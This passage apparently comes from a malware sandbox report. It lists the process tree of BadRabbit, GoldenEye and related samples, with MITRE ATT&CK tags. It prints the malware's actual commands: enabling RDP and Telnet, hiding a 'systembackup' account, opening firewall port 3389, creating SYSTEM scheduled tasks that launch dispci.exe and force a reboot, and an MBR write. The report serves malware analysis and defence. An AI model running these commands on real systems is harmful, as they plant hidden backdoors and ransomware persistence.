        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4584
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4616
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5088
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
      4⤵
      Hide Artifacts: Hidden Users
      System Location Discovery: System Language Discovery
      PID:3432
  - - C:\Windows\SysWOW64\attrib.exe
      attrib C:\users\systembackup +r +a +s +h
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:760
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add portopening TCP 3389 "Remote Desktop"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:1620
  - - C:\Windows\SysWOW64\sc.exe
      sc config tlntsvr start=auto
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:1036
  - - C:\Windows\SysWOW64\net.exe
      net start Telnet
      4⤵
      System Location Discovery: System Language Discovery
      PID:2168
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start Telnet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1252
- - C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
    "C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates connected drives
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6216 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1260 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3424 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:4800
- C:\Users\Admin\Downloads\BadRabbit.exe
  "C:\Users\Admin\Downloads\BadRabbit.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:5028
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
    3⤵
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2712
  - - C:\Windows\SysWOW64\cmd.exe
      /c schtasks /Delete /F /TN rhaegal
      4⤵
      System Location Discovery: System Language Discovery
      PID:3860
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /F /TN rhaegal
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2964
  - - C:\Windows\SysWOW64\cmd.exe
      /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3946885128 && exit"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2420
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3946885128 && exit"
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:812
  - - C:\Windows\SysWOW64\cmd.exe
      /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:03:00
      4⤵
      System Location Discovery: System Language Discovery
      PID:5096
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:03:00
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2348
  - - C:\Windows\D775.tmp
      "C:\Windows\D775.tmp" \\.\pipe\{707A40CF-0612-49E9-9227-71739940D727}
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:4708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6480 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6288 /prefetch:1
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5692 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,11349083592428850419,13227796713735320509,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3068 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1712
- C:\Users\Admin\Downloads\GoldenEye.exe
  "C:\Users\Admin\Downloads\GoldenEye.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  PID:4436
- - C:\Users\Admin\AppData\Roaming\{70bb6694-4a23-44ca-acb1-744821b43907}\getmac.exe
    "C:\Users\Admin\AppData\Roaming\{70bb6694-4a23-44ca-acb1-744821b43907}\getmac.exe"
    3⤵
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - System Location Discovery: System Language Discovery
    PID:2448

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3092

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3820 -ip 3820
1⤵
PID:3000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 1284 -ip 1284
1⤵
PID:4756

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- System Location Discovery: System Language Discovery
PID:1316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Safe Mode Boot

T1562.009

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

System Information Discovery